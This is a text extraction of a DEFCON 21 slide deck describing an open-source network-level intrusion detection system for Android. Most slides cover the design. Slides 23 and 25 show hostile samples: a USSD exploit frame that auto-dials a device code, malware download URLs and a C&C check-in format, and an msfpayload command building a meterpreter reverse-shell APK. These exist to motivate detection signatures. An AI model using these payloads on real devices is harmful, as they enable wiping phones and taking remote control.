BUILDING AN ANDROID IDS ON NETWORK LEVEL at DEFCON 21 by JAIME SANCHEZ More information at: Twitter: @segofensiva Website: http://www.seguridadofensiva.com Being popular is not always a good thing and hereís why. As mobile devices grow in popularity, so do the incentives for attackers. Mobile malware and threats are clearly on the rise, as attackers experiment with new business models by targeting mobile phones. Nowadays, several behavior-based malware analysis and detection techniques for mobile threats have been proposed for mobile devices. We'll show how we built a new detection framework that will be the first open source Android IDS on network level. This open source network-based intrusion detection system and network-based intrusion protection system has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks, featuring: Protocol analysis, Content searching and Content matching. In IDS/IPS mode, the program will monitor network traffic and analyze it against a rule set defined by the user, and then perform a specific action based on what has been identified. With the help of custom build signatures, the framework can also be used to detect probes or attacks designed for mobile devices, fool and cheat operating system fingerprinting attempts (like nmap or p0f), server message block probes, etc.

1. BUILDING AN ANDROID IDS
ON NETWORK LEVEL
Jaime Sanchez
@segofensiva
http://www.seguridadofensiva.com
jsanchez@seguridadofensiva.com

2. 2
$
WHO
I
AM
§
Passionate
about
computer
security.
§
Computer
Engineering
degree
and
an
Execu7ve
MBA.
§
In
my
free
7me
I
conduct
research
on
security
and
work
as
an
independent
consultant.
§
I’m
from
Spain;
We’re
sexy
and
you
know
it.
§
Other
conferences:
§
RootedCON
in
Spain
§
Nuit
Du
Hack
in
Paris
§
Black
Hat
Arsenal
USA
§
Next
months:
DerbyCON
and
Hack7vity.
BUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21

3. 3 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
FIRST
TIME
IN
LAS
VEGAS
!!

4. 4 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
§
Being
popular
is
not
always
a
good
thing.
§
Mobile
malware
and
threats
are
clearly
on
the
rise.
§
Over
100
million
Android
phones
shipped
in
the
second
quarter
of
2012
alone.
§
Targets
this
large
are
difficult
for
aNackers
to
resist!
WHY?

5. 5 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
USSD
EXPLOIT
WEBKIT
VULNERABILITIES
TARGETED
MALWARE
!!!
METERPRETER
FOR
ANDROID
!!!

6. 6 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
§
In
order
to
analyze
the
traffic
flows
we’ll
create
a
VPN
tunnel
between
our
Android
device
and
our
computer.
§
Configure
and
launch
snort
on
the
remote
machine
to
detect
suspicious
traffic.
§
We
can
also
use
tools
like
tcpdump
to
capture
traffic
for
later
analysis.
FIRST
APPROACH
VPN
eth0:WiFi
rmnet0: 3G
snort
tcpdump

7. 7 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
PROBLEMS

8. 8 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
CONTINUED
MY
LIFE
...
§
OSfooler
is
a
pracIcal
approach
presented
at
Black
Hat
Arsenal
USA
2013.
It
can
be
used
to
detect
and
defeat
acIve
and
passive
remote
OS
fingerprinIng
from
tools
like
nmap,
p0f
or
commercial
appliances.
FUCKYEAH!!

9. KERNEL
SPACE USER
SPACE
§
KERNEL
SPACE
is
strictly
reserved
for
running
the
kernel,
kernel
extensions,
and
most
device
drivers.
§
USER
SPACE
usually
refers
to
the
various
programs
and
libraries
that
the
operaIng
system
uses
to
interact
with
the
kernel:
soQware
that
performs
input/output,
manipulates
file
system,
objects,
etc.
How
i
met
your
packetFrom
kernel
Space
to
user
Heaven
9
FROM KERNEL SPACE TO USER HEAVEN
NUIT DU HACK 2013
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21
VS

10. 10
How Imet your
packets
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21

11. NIC
Memory
DMA
EngineInterrupt
Incoming
Packet
Ring
Buffer
Interrupt
Handler
NIC
Memory
Kernel
Packet
Data
IP
Layer
TCP
Process
TCP
recv
Buffer
APPLICATION
DEVICE
DRIVER
KERNEL
SPACE
USER
SPACE
Poll
List
soirq
tcp_v4_rcv()
Pointer
to
Device
Socket
Backlog
ip_rcv()
read()
locally
des7ned
packets
must
pass
the
INPUT
chains
to
reach
listening
sockets
INPUT
FORWARD
PREROUTING
MANGLECONNTRACK FILTER
forwarded
and
accepted
packets
Inbound
Packets
forwarded
packets
local
packets
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21

12. How
i
met
your
packetFrom
kernel
Space
to
user
Heaven
§
A
target
extension
consists
of
a
KERNEL
MODULE,
and
an
opIonal
extension
to
iptables
to
provide
new
command
line
opIons.
§
There
are
several
extensions
in
the
default
NeVilter
distribuIon:
12
FROM KERNEL SPACE TO USER HEAVEN
NUIT DU HACK 2013
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21

13. §
For
this
to
be
useful,
two
further
components
are
required:
• a
QUEUE
HANDLER
which
deals
with
the
actual
mechanics
of
passing
packets
between
the
kernel
and
userspace
• a
USERSPACE
APPLICATION
to
receive,
possibly
manipulate,
and
issue
verdicts
on
packets.
§
The
default
value
for
the
maximum
queue
length
is
1024.
Once
this
limit
is
reached,
new
packets
will
be
dropped
unIl
the
length
of
the
queue
falls
below
the
limit
again.
$ iptables -A INPUT -j NFQUEUE --queue-num 0
DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL

14. 14 DEFCON 21
BUILDING AN ANDROID IDS ON NETWORK LEVEL
§
I
need
to
process
traffic
before
being
processed
inside
my
Android
device.
§
I
can
redirect
all
network
packet
from
Kernel
Space
to
User
Space
§
I
can
do
whatever
I
want
with
the
packets:
analyze,
process,
modify
them
§
This
is
done
in
Real-­‐7me.
SUMMARY

15. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
AndroIDS
§
Create
an
open
source
network-­‐based
intrusion
detecIon
system
(IDS)
and
network-­‐based
intrusion
protecIon
system
(IPS)
has
the
ability
to
perform
real-­‐Ime
traffic
analysis
and
packet
logging
on
Internet
Protocol
(IP)
networks:
§
It
should
feature:
§
Protocol
analysis
§
Content
searching
§
Content
matching

16. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
IDS
ARCHITECTURE:
SENSOR
§
Runs
conInuously
without
human
supervision
and
feature:
§
Analyze
traffic
§
Send
push
alerts
to
the
Android
device
in
order
to
warn
the
user
about
the
threat
§
Report
to
Logging
Server
Custom
reacIve
acIons:
§
Drop
specific
packet
§
Add
new
rule
in
iptables
firewall
§
Launch
script
/
module
§
Sync
aaack
signatures
to
keep
them
updated.
§
It
should
impose
minimal
overhead.

17. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
IDS
ARCHITECTURE:
SERVER
§
The
server
is
running
inside
a
Linux
Box,
and
is
receiving
all
the
messages
the
Android
sensor
is
sending.
§
Server
is
responsible
for:
§
Send
signatures
to
remote
devices
§
Store
events
in
database
§
Detects
staIsIcal
anomalies
&
analysis
real-­‐Ime.
Android
Device
Internet Firewall
IDS
Server
&
Database
Web
Interface

18. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
PROTOCOL
ANALYSIS
LOOKS
LIKE
I
PICKED
THE
WRONG
WEEK
TO
QUIT
SNIFFING
PACKETS

19. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
EXAMPLE
§
Packet
with
FIN,
SYN,
PUSH
and
URG
flags
ac7ve.
§
Report
to
the
Central
Logger
and
DROP
the
packet.

20. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
REMOTE
OS
FINGERPRINTING
§
Detect
and
drop
packet
sent
from
well-­‐known
scanning
tools.
§
nmap
OS
fingerprin7ng
works
by
sending
up
to
16
TCP,
UDP,
and
ICMP
probes
to
known
open
and
closed
ports
of
the
target
machine.
SEQUENCE
GENERATION
(SEQ,
OPS,
WIN
&
T1)
ICMP
ECHO
(IE)
TCP
EXPLICIT
CONGESTION
NOTIFICATION
(ECN)
TCP
T2-­‐T7
UDP

21. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
PATTERN
MATCHING
I’M
WATCHING
YOU...

22. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
SIGNATURE
FORMAT
§
With
the
help
of
custom
build
signatures,
the
framework
can
also
be
used
to
detect
probes
or
aaacks
designed
for
mobile
devices
§
Useful
signatures
from
Snort
and
Emerging
Threats
§
Convert
snort-­‐like
rules
to
a
friendly
format:

23. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
USSD
EXPLOIT
§
A
USSD
code
is
entered
into
phones
to
perform
acIons.
§
They
are
mainly
used
by
network
operators
to
provide
customers
with
easy
access
to
pre-­‐
configured
services,
including:
§
call-­‐forwarding
§
balance
inquiries
§
mulIple
SIM
funcIons.
§
The
HTML
code
to
execute
such
an
acIon
is
as
follows:
<a
href="tel:xyz">Click
here
to
call</a>
§
Example
exploit:
<frameset>
<frame
src="tel:*2767*3855#"
/>
</
frameset>

24. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
WEB
SIGNATURES

25. DEFCON 21
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
MALWARE
§
ANDR.TROJAN.SMSSEND
§
Download
from:
§
hxxp://adobeflashplayer-­‐up.ru/?a=RANDOM_CHARACTERS
–
93.170.107.184
§
hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS
–
93.170.107.184
§
hxxp://browsernew-­‐update.ru/?a=RANDOM_CHARACTERS
–
93.170.107.184
§
Once
executed,
connect
to
C&C:
gaga01.net/rq.php
§oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i
d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo
ne=XXXXXX
§
Search
paaern:
rq.php
§
METERPRETER
§
It
features
command
history,
tab
compleIon,
channels,
and
more.
§
Let’s
try:
$
msfpayload
android/meterpreter/reverse_tcp
LHOST=192.168.0.20
R
>
meter.apk
$
file
meter.apk
meter.apk:
Zip
archive
data,
at
least
v2.0
to
extract

26. T
H
A
N
K
Y
O
U
!
How
i
met
your
packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
DEFCON 21
Jaime
Sánchez
@segofensiva
jsanchez@segofensiva.com